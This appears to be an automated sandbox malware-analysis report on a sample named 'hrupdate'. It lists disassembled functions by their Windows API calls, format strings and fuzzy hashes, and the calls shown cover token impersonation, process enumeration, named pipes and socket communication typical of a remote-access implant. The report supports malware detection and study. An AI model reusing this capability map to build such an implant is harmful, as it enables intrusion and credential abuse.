                                      • API ID: __snprintf$_memset$CloseHandleHttpInternetRequest$OpenSendSleep
                                      • String ID: %s%s$*/*
                                      • API String ID: 3375730287-856325523
                                      • Opcode ID: b5c12342ca27f6e53445082950d6ec9b2299419791799e91af6316ddb010ce37
                                      • Instruction ID: 454ece3e4e000af9029240d0fbd7106773056f35766daf74a58425cbf38c184e
                                      • Opcode Fuzzy Hash: b5c12342ca27f6e53445082950d6ec9b2299419791799e91af6316ddb010ce37
                                      • Instruction Fuzzy Hash: 4861B472D00219AFEF11AFA4DD44EEE7BBDEB05304F0440A9E605A3211F775AE588F64
                                      Function 04698E95 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 04698EC3
                                      • _memset.LIBCMT ref: 04698EDF
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,046990F0,?,04698F09,046990F0,?,00000400), ref: 0469764B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,046990F0,04698F09,?,04698F09,046990F0,?,00000400,?,?,?,?,046990F0), ref: 04697664
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,046990F0,0469E106,?,?,0469E106,?), ref: 04698F29
                                      • GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,046990F0,0469E106,?,?,0469E106,?), ref: 04698F38
                                      • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C2E8296A,83FFFFD9), ref: 04698F6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
                                      • String ID: sysnative$system32
                                      • API String ID: 2486443368-2461298002
                                      • Opcode ID: 32fa74a5e886ed3b8a3a0809681b96f85aed69606e8a180ba967d398c26d4a5a
                                      • Instruction ID: 5af79375583b4503e4b9f0ad30ec19aeafc4ba6db388b094f66b05473e70f434
                                      • Opcode Fuzzy Hash: 32fa74a5e886ed3b8a3a0809681b96f85aed69606e8a180ba967d398c26d4a5a
                                      • Instruction Fuzzy Hash: 5C510672604245AFDB21AF64DC84EA773EDEF95304F14482DE589C3201FA75BD088B66
                                      Function 0469F317 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 161processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0469F339
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                      • GetCurrentProcess.KERNEL32 ref: 0469F384
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0469F3B9
                                      • Process32First.KERNEL32(00000000,?), ref: 0469F3DB
                                        • Part of subcall function 0469590F: htonl.WS2_32(00000000), ref: 04695915
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0469F4BE
                                        • Part of subcall function 0469F2AA: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 0469F2B7
                                      • ProcessIdToSessionId.KERNEL32(?,?,?,00000002,00000000), ref: 0469F463
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
                                      • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                      • API String ID: 3674674043-1833344708
                                      • Opcode ID: 08e391ee5fabc6f6e5ce67a01dce01dd1ce56eb20a6b12c4f6be023cb42fb39f
                                      • Instruction ID: 329d123c0ec4bc600cef22e2576dd0c515d952cdd6f1e201930b6dc6806e64ba
                                      • Opcode Fuzzy Hash: 08e391ee5fabc6f6e5ce67a01dce01dd1ce56eb20a6b12c4f6be023cb42fb39f
                                      • Instruction Fuzzy Hash: 56517372D0421DAAEF15ABA4CC45FEE77FCDF04718F100069E509E2141FA74BE958BA5
                                      Function 046A2602 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 129COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 046A2626
                                        • Part of subcall function 046A23B3: _memset.LIBCMT ref: 046A244F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset
                                      • String ID: 0-v$0.v$0/v$@Cv$P.v$`+v$p,v$p=v$/v
                                      • API String ID: 2102423945-2462229890
                                      • Opcode ID: 6ad8180fdeef0ab323de25507958883153845f178674c75bceb06ad390e5a579
                                      • Instruction ID: 4bab0d1608dc3a21cfce58719d6a65cebf81418981679e921af73b46bace59f4
                                      • Opcode Fuzzy Hash: 6ad8180fdeef0ab323de25507958883153845f178674c75bceb06ad390e5a579
                                      • Instruction Fuzzy Hash: E1414731D5982C6BE711EF25CE66CC962BEAF44224F4601E7A00DB7240F670FF658EA5
                                      Function 0469D701 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469D712
                                      • select.WS2_32(00000000,00000000,?,?,00000000), ref: 0469D75D
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D76D
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D780
                                      • GetTickCount.KERNEL32 ref: 0469D789
                                      • gethostbyname.WS2_32(?), ref: 0469D794
                                      • htons.WS2_32(?), ref: 0469D7A7
                                      • inet_addr.WS2_32(?), ref: 0469D7B3
                                      • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0469D7CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                      • String ID: d
                                      • API String ID: 1257931466-2564639436
                                      • Opcode ID: 1056d3bef331116d7464a0cc00ff16f890456eff9c887b633e29747ca6ce7f41
                                      • Instruction ID: f0646baf04bfe029401f24b749abbd69172785e27d62f6e0a93b0d0c52436265
                                      • Opcode Fuzzy Hash: 1056d3bef331116d7464a0cc00ff16f890456eff9c887b633e29747ca6ce7f41
                                      • Instruction Fuzzy Hash: 28214F75900309AADF119FA0EC45BEE7BB9EF08304F1001A6EA04AA151F775EE958F94
                                      Function 046A1283 Relevance: 16.8, APIs: 11, Instructions: 289COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                      • _memset.LIBCMT ref: 046A12EC
                                        • Part of subcall function 046A175D: _memset.LIBCMT ref: 046A1859
                                      • _malloc.LIBCMT ref: 046A12FA
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _memset.LIBCMT ref: 046A130C
                                        • Part of subcall function 046A4B98: _malloc.LIBCMT ref: 046A4BBF
                                        • Part of subcall function 046A4B98: _memset.LIBCMT ref: 046A4BED
                                        • Part of subcall function 046A1871: _memset.LIBCMT ref: 046A1950
                                      • _malloc.LIBCMT ref: 046A132F
                                      • _memset.LIBCMT ref: 046A1341
                                        • Part of subcall function 046A4B98: _realloc.LIBCMT ref: 046A4BCE
                                      • htonl.WS2_32(00000000), ref: 046A1372
                                      • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 046A13DB
                                      • GetComputerNameA.KERNEL32(0469F6FF,?), ref: 046A1408
                                      • GetUserNameA.ADVAPI32(?,?), ref: 046A1435
                                        • Part of subcall function 04697388: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 046973AC
                                      • _malloc.LIBCMT ref: 046A1504
                                      • _memset.LIBCMT ref: 046A1591
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_malloc$Name$Computer$AllocateHeapSocketUser_reallochtonl
                                      • String ID:
                                      • API String ID: 2958771099-0
                                      • Opcode ID: baac746fd596eb03cbb95402ad302934dbbf3602bff8cae3882802ad746433b6
                                      • Instruction ID: 3c6ddd24825ca8ca3c94f05b818067f3a22b3e95db91629efc8cf0d99314ca97
                                      • Opcode Fuzzy Hash: baac746fd596eb03cbb95402ad302934dbbf3602bff8cae3882802ad746433b6
                                      • Instruction Fuzzy Hash: 07912872D40B046AFB20ABA4DC85FEE77ACEF45714F10402EF544AB280FA76BD518B64
                                      Function 046A4268 Relevance: 16.6, APIs: 11, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      • htonl.WS2_32 ref: 046A4290
                                      • htonl.WS2_32(?), ref: 046A42A0
                                      • GetLastError.KERNEL32 ref: 046A42CC
                                      • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 046A42F0
                                      • GetLastError.KERNEL32 ref: 046A42FA
                                      • ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 046A4319
                                      • GetLastError.KERNEL32 ref: 046A431F
                                      • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,046DAF5C), ref: 046A433E
                                      • GetLastError.KERNEL32 ref: 046A4348
                                      • ImpersonateLoggedOnUser.ADVAPI32 ref: 046A435A
                                      • GetLastError.KERNEL32 ref: 046A4360
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$ImpersonateLoggedTokenUserhtonl$DuplicateOpenProcess
                                      • String ID:
                                      • API String ID: 332438066-0
                                      • Opcode ID: aa6e5ee7671c3956e9743f2a57b84cb7fac802f4412c91d5183187c155316b15
                                      • Instruction ID: eef1b2982ec44e99b368acf6196d159ad1d2a6ef680360dc3c90327181930169
                                      • Opcode Fuzzy Hash: aa6e5ee7671c3956e9743f2a57b84cb7fac802f4412c91d5183187c155316b15
                                      • Instruction Fuzzy Hash: EF41F3B1A00608FAFB206FA1DC49FBA3BACEF01749F104165E901A5241FFB46DA59F21
                                      Function 0469C74E Relevance: 16.6, APIs: 11, Instructions: 90pipesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469C75D
                                      • GetTickCount.KERNEL32 ref: 0469C767
                                      • GetLastError.KERNEL32 ref: 0469C7C1
                                        • Part of subcall function 046A3BBA: _memset.LIBCMT ref: 046A3C43
                                      • GetLastError.KERNEL32 ref: 0469C783
                                      • WaitNamedPipeA.KERNEL32(?,00002710), ref: 0469C798
                                        • Part of subcall function 0469C387: _memset.LIBCMT ref: 0469C3A8
                                      • Sleep.KERNEL32(000003E8), ref: 0469C7A5
                                      • GetTickCount.KERNEL32 ref: 0469C7AB
                                      • GetLastError.KERNEL32 ref: 0469C7D1
                                      • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 0469C7EE
                                      • GetLastError.KERNEL32 ref: 0469C7F8
                                      • DisconnectNamedPipe.KERNEL32(?), ref: 0469C832
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$CountNamedPipeTick$_memset$DisconnectHandleSleepStateWait
                                      • String ID:
                                      • API String ID: 3382687554-0
                                      • Opcode ID: 8ed66827f00a262d5c9451f1614a1332a96a3ee644e95efaaccb4d2f02097bba
                                      • Instruction ID: 8ef0594702b0e64e62182c2677aff0cb1a3441dacff6d2074873f548fb821cd1
                                      • Opcode Fuzzy Hash: 8ed66827f00a262d5c9451f1614a1332a96a3ee644e95efaaccb4d2f02097bba
                                      • Instruction Fuzzy Hash: FD21D332A042046BFF006BB4DC85BBD3ADCEB06764F200426F605EA5C1FFA4BD915AA5
                                      Function 0469D63B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59networksleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469D64C
                                      • select.WS2_32(00000000,00000000,?,?,00000000), ref: 0469D69A
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D6AA
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D6BD
                                      • send.WS2_32(?,00000000,?,00000000), ref: 0469D6D1
                                      • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 0469D6DB
                                      • Sleep.KERNEL32(000003E8), ref: 0469D6ED
                                      • GetTickCount.KERNEL32 ref: 0469D6F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$ErrorLastSleepselectsend
                                      • String ID: d
                                      • API String ID: 2152284305-2564639436
                                      • Opcode ID: b898984ca2ed71160639e443b8abf351919c805a253daac47dd92afc1cbca6d3
                                      • Instruction ID: 29fdbd400cbbe42bee9ccd64502e6b94237390cee9d634eacab0b0d338aed492
                                      • Opcode Fuzzy Hash: b898984ca2ed71160639e443b8abf351919c805a253daac47dd92afc1cbca6d3
                                      • Instruction Fuzzy Hash: 01117C31A0020DABDB119FA4DC84BE97ABCEB04314F1001B6E608D2190EBB4BE959FD0
                                      Function 0469A9C6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0469A9D6
                                      • _memset.LIBCMT ref: 0469A9E2
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469AB9E
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469ABA9
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABB5
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABC0
                                        • Part of subcall function 0469AB4C: _rand.LIBCMT ref: 0469AC1E
                                      • __snprintf.LIBCMT ref: 0469AA33
                                      • __snprintf.LIBCMT ref: 0469AA4B
                                      • _memset.LIBCMT ref: 0469AA6A
                                      • _memset.LIBCMT ref: 0469AA75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$__snprintf_malloc$_rand
                                      • String ID: %s&%s$?%s
                                      • API String ID: 1876596931-1750478248
                                      • Opcode ID: 049669ce170371697362afc36fe89a6d4eef69d8595eb903441130804ca49a4f
                                      • Instruction ID: c0d25f978af9debee9d070ee39c7e534a83d4c4c3ba3b836a1cb2110c24cf308
                                      • Opcode Fuzzy Hash: 049669ce170371697362afc36fe89a6d4eef69d8595eb903441130804ca49a4f
                                      • Instruction Fuzzy Hash: E2219F72500140BBEF14AE45CD81F5B3BA9EF91704F144098EE006B296E6B1FE61CBE9
                                      Function 0469D530 Relevance: 13.6, APIs: 9, Instructions: 101networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • htonl.WS2_32 ref: 0469D54F
                                      • htons.WS2_32(00000000), ref: 0469D560
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0469D599
                                      • closesocket.WS2_32(00000000), ref: 0469D5A8
                                      • gethostbyname.WS2_32(00000000), ref: 0469D5C6
                                      • htons.WS2_32(?), ref: 0469D5F2
                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0469D605
                                      • connect.WS2_32(00000000,?,00000010), ref: 0469D616
                                      • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 0469D61F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                      • String ID:
                                      • API String ID: 3339321253-0
                                      • Opcode ID: b3df2fbe22fb5934ac3a91e48de5a41b752494447ac1cb1a1eb7b84b491f055e
                                      • Instruction ID: 0be0568fac207c345b4ab4120dbdcd22c0025d80a914af6a6909025634e559b4
                                      • Opcode Fuzzy Hash: b3df2fbe22fb5934ac3a91e48de5a41b752494447ac1cb1a1eb7b84b491f055e
                                      • Instruction Fuzzy Hash: 4431D6B2E002186AEF21ABA4CC44EFE77ECDF4425CF144079E544E7180F674BE4587A9
                                      Function 046991A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                      • _memset.LIBCMT ref: 04699203
                                      • GetStartupInfoA.KERNEL32(?), ref: 0469921B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,046990F0,?,04698F09,046990F0,?,00000400), ref: 0469764B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,046990F0,04698F09,?,04698F09,046990F0,?,00000400,?,?,?,?,046990F0), ref: 04697664
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 04699280
                                      • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 0469928A
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,0469773C), ref: 046992B5
                                      • GetLastError.KERNEL32 ref: 046992C4
                                        • Part of subcall function 04696B06: _vswprintf_s.LIBCMT ref: 04696B22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                                      • String ID: %s as %s\%s: %d
                                      • API String ID: 963358868-816037529
                                      • Opcode ID: 7e9c04b1cd813ce51ee2249352b4bca33ccf4de62e1c4fec5339a1403a6e5649
                                      • Instruction ID: 5a764b656ca386bbb302c4c6359c1bfe22dafbda339f6e3ae3e83ce8f4fc78a6
                                      • Opcode Fuzzy Hash: 7e9c04b1cd813ce51ee2249352b4bca33ccf4de62e1c4fec5339a1403a6e5649
                                      • Instruction Fuzzy Hash: 84413972D00208BAEF01AFA5DC44AEFBFBDEF59314F104029F608A6160E6B55911DBA5
                                      Function 046A40BA Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 046A40DE
                                      • _memset.LIBCMT ref: 046A40EC
                                      • _memset.LIBCMT ref: 046A40FA
                                      • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 046A4117
                                      • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 046A4146
                                      • __snprintf.LIBCMT ref: 046A4168
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$AccountInformationLookupToken__snprintf
                                      • String ID: %s\%s
                                      • API String ID: 2009363630-4073750446
                                      • Opcode ID: 7d08535a1eb7b8d3b380910b5f916cced3593a45ad79fe1973cd7f7994aa8eb0
                                      • Instruction ID: 31826b385066d02c928934b0f685416238259de433748cb8b49b5f980dfbf003
                                      • Opcode Fuzzy Hash: 7d08535a1eb7b8d3b380910b5f916cced3593a45ad79fe1973cd7f7994aa8eb0
                                      • Instruction Fuzzy Hash: 082191B294011DBADB11DA90DC84EEB77BCEB15644F0444BAB615E2100EA74AFD48FA5
                                      Function 04695AA2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: htonl$__vscwprintf_helper_malloc_memset_vswprintf_s_vwprintf
                                      • String ID: 9
                                      • API String ID: 1612592715-2366072709
                                      • Opcode ID: 4263974810f653cee3035b964d8c62451eb001bf5c73a31983de5078014a428e
                                      • Instruction ID: 4e8b3345ebd59e3e535282945a7b027df2652d1321cfefcdc833b0f4801386fb
                                      • Opcode Fuzzy Hash: 4263974810f653cee3035b964d8c62451eb001bf5c73a31983de5078014a428e
                                      • Instruction Fuzzy Hash: 6511B976800709FFEF12AFA4C980ADEBBFCEF44218F10446AE95597140FB71AE558B54
                                      Function 04697CA3 Relevance: 12.1, APIs: 8, Instructions: 105sleeppipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountErrorLastSleepTick$BuffersDisconnectFileFlushNamedPipe
                                      • String ID:
                                      • API String ID: 3377695601-0
                                      • Opcode ID: 514c7d2c89b0cb3e58b9d80f03f13089021136a6c6eaabfefee522c80d0cda9b
                                      • Instruction ID: a7c90f80eab58eb588f505c71e6cfb4e51807f3ca5d8ba7657a9a315fe0807dc
                                      • Opcode Fuzzy Hash: 514c7d2c89b0cb3e58b9d80f03f13089021136a6c6eaabfefee522c80d0cda9b
                                      • Instruction Fuzzy Hash: 073141B2D00218EBEF01EBE4DC85AEE77BCEB05215F140466E905E2241FA75AE488F65
                                      Function 046AFB12 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 3886058894-0
                                      • Opcode ID: 2dcd1c0d9137e8368c2b94111f2da4de1d422b23fb1f42fcf42c423265031aed
                                      • Instruction ID: c64132f85d1acbc01cd77f7d80d7165a7f0d34ab1c3c96bcc638a7643c329c65
                                      • Opcode Fuzzy Hash: 2dcd1c0d9137e8368c2b94111f2da4de1d422b23fb1f42fcf42c423265031aed
                                      • Instruction Fuzzy Hash: DE513B70A00A04EFCB289F79CC4459FBBB5EF50324F148619E86652290F730BD65CF96
                                      Function 0469AB4C Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_malloc$_rand
                                      • String ID:
                                      • API String ID: 2453798774-0
                                      • Opcode ID: 43a630f9c2c5dc45cb3fd9fca9a2bac02f805ed883695b139c2e326fcb9720ec
                                      • Instruction ID: e0c263a2156e36054538b5643aa26689aaacb178fc3020664f9e1903dcd0f323
                                      • Opcode Fuzzy Hash: 43a630f9c2c5dc45cb3fd9fca9a2bac02f805ed883695b139c2e326fcb9720ec
                                      • Instruction Fuzzy Hash: 32513931A00245AFEF019FB8CC54BFE7BF9DF56204F184099E985AB350FA71AE048794
                                      Function 046A1BB6 Relevance: 10.6, APIs: 7, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • __time64.LIBCMT ref: 046A1BC8
                                        • Part of subcall function 046AEC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046A1BCD,00000000,00000080,00000000,00000000,?,?,?,046945CD,?,00000000,00000000), ref: 046AEC30
                                        • Part of subcall function 046AEC25: __aulldiv.LIBCMT ref: 046AEC50
                                        • Part of subcall function 046AEFA9: __getptd.LIBCMT ref: 046AEFAE
                                      • _malloc.LIBCMT ref: 046A1C0F
                                      • _memset.LIBCMT ref: 046A1C1C
                                      • _strtok.LIBCMT ref: 046A1C36
                                      • _strncpy.LIBCMT ref: 046A1C6E
                                      • _strncpy.LIBCMT ref: 046A1C96
                                      • _strtok.LIBCMT ref: 046A1CA2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time_strncpy_strtok$FileSystem__aulldiv__getptd__time64_malloc_memset
                                      • String ID:
                                      • API String ID: 3612108075-0
                                      • Opcode ID: 258f2f9866b8ebb61934d4b7fc86b119a763a305cbd324ba8ef88b79bd288579
                                      • Instruction ID: da26f8a35725279005dda0ebf4f2cbdf9bac5624717f4def8e5896d3847e03e9
                                      • Opcode Fuzzy Hash: 258f2f9866b8ebb61934d4b7fc86b119a763a305cbd324ba8ef88b79bd288579
                                      • Instruction Fuzzy Hash: DF31F1B2200A06AEEB109F34CC85BDB7BADEB45258F00442DF55AC7180FA35F9694B54
                                      Function 046A47B4 Relevance: 10.6, APIs: 7, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32 ref: 046A47E8
                                      • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 046A4806
                                      • GetLastError.KERNEL32 ref: 046A4810
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$OpenProcessToken
                                      • String ID:
                                      • API String ID: 2009710997-0
                                      • Opcode ID: 980f6411ab10b11a627b3a74d13847bf6dd21627529d16d9d2ab7ea6f41cb637
                                      • Instruction ID: 2c91f1b0387815a68ac81bb20c1b6d3eb2955ab36d79746f48b09f3aed13b55a
                                      • Opcode Fuzzy Hash: 980f6411ab10b11a627b3a74d13847bf6dd21627529d16d9d2ab7ea6f41cb637
                                      • Instruction Fuzzy Hash: C1215471A00714BFFB506FF1EC4ABAA7A68EF11719F104028B60594181FAF8EE64DE65
                                      Function 0469AA90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0469AAA0
                                      • _memset.LIBCMT ref: 0469AAAC
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469AB9E
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469ABA9
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABB5
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABC0
                                        • Part of subcall function 0469AB4C: _rand.LIBCMT ref: 0469AC1E
                                      • __snprintf.LIBCMT ref: 0469AB08
                                      • _memset.LIBCMT ref: 0469AB26
                                      • _memset.LIBCMT ref: 0469AB31
                                      Strings
